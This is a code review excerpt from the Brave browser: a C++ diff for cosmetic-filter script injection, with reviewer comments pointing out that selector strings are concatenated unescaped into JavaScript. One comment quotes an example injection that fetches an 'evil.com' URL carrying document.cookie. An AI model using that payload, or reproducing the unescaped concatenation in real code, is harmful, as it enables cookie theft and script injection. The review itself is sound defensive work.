browser/brave_cosmetic_resources_tab_helper.cc

```diff
@@ -0,0 +1,461 @@
+  if (BraveCosmeticResourcesTabHelper::observing_script_->empty()) {
+    *BraveCosmeticResourcesTabHelper::observing_script_ =
+        LoadDataResource(kCosmeticFiltersGenerated[0].value);
+  }
+}
+
+BraveCosmeticResourcesTabHelper::~BraveCosmeticResourcesTabHelper() {
+}
+
+void BraveCosmeticResourcesTabHelper::GetUrlCosmeticResourcesOnUI(
+    content::GlobalFrameRoutingId frame_id, const std::string& url,
+    bool do_non_scriplets, std::unique_ptr<base::ListValue> resources) {
+  if (!resources) {
+    return;
+  }
+  for (auto i = resources->GetList().begin();
+      i < resources->GetList().end(); i++) {
+    base::DictionaryValue* resources_dict;
+    if (!i->GetAsDictionary(&resources_dict)) {
+      continue;
+    }
+    std::string to_inject;
+    resources_dict->GetString("injected_script", &to_inject);
+    if (to_inject.length() > 1) {
+      auto* frame_host = content::RenderFrameHost::FromID(frame_id);
+      if (!frame_host)
+        return;
+      frame_host->ExecuteJavaScriptInIsolatedWorld(
+          base::UTF8ToUTF16(to_inject),
+          base::NullCallback(), ISOLATED_WORLD_ID_CHROME_INTERNAL);
+    }
+    // Working on css rules
+    if (!do_non_scriplets)
+      return;
+    CSSRulesRoutine(url, resources_dict, frame_id);
+  }
+}
+
+void BraveCosmeticResourcesTabHelper::CSSRulesRoutine(
+    const std::string& url_string, base::DictionaryValue* resources_dict,
+    content::GlobalFrameRoutingId frame_id) {
+  // Check are first party cosmetic filters enabled
+  const GURL url(url_string);
+  if (url.is_empty() || !url.is_valid() || IsVettedSearchEngine(url.host())) {
+    return;
+  }
+
+  Profile* profile = Profile::FromBrowserContext(
+    web_contents()->GetBrowserContext());
+  enabled_1st_party_cf_filtering_ =
+      brave_shields::IsFirstPartyCosmeticFilteringEnabled(
+          HostContentSettingsMapFactory::GetForProfile(profile), url);
+  base::ListValue* cf_exceptions_list;
+  if (resources_dict->GetList("exceptions", &cf_exceptions_list)) {
+    for (size_t i = 0; i < cf_exceptions_list->GetSize(); i++) {
+      exceptions_.push_back(cf_exceptions_list->GetList()[i].GetString());
+    }
+  }
+  base::ListValue* hide_selectors_list;
+  base::ListValue* force_hide_selectors_list = nullptr;
+  if (resources_dict->GetList("hide_selectors", &hide_selectors_list)) {
+    if (enabled_1st_party_cf_filtering_) {
+      force_hide_selectors_list = hide_selectors_list;
+    } else {
+      std::string cosmeticFilterConsiderNewSelectors_script =
+          "(function() {"
+            "let nextIndex = window.cosmeticStyleSheet.rules.length;";
+      for (size_t i = 0; i < hide_selectors_list->GetSize(); i++) {
+        std::string rule = hide_selectors_list->GetList()[i].GetString() +
+            "{display:none !important;}";
+        cosmeticFilterConsiderNewSelectors_script +=
+            "if (!window.allSelectorsToRules.has(`" +
+              hide_selectors_list->GetList()[i].GetString() + "`)) {"
```

Comment:
can we add some kind of validation on `hide_selectors_list->GetList()[i].GetString()` so that `") window.fetch('http://evil.com/' + document.cookie)` won't get injected as a script?

Reply:
same with `rule`

Reply:
addressed using a json array of strings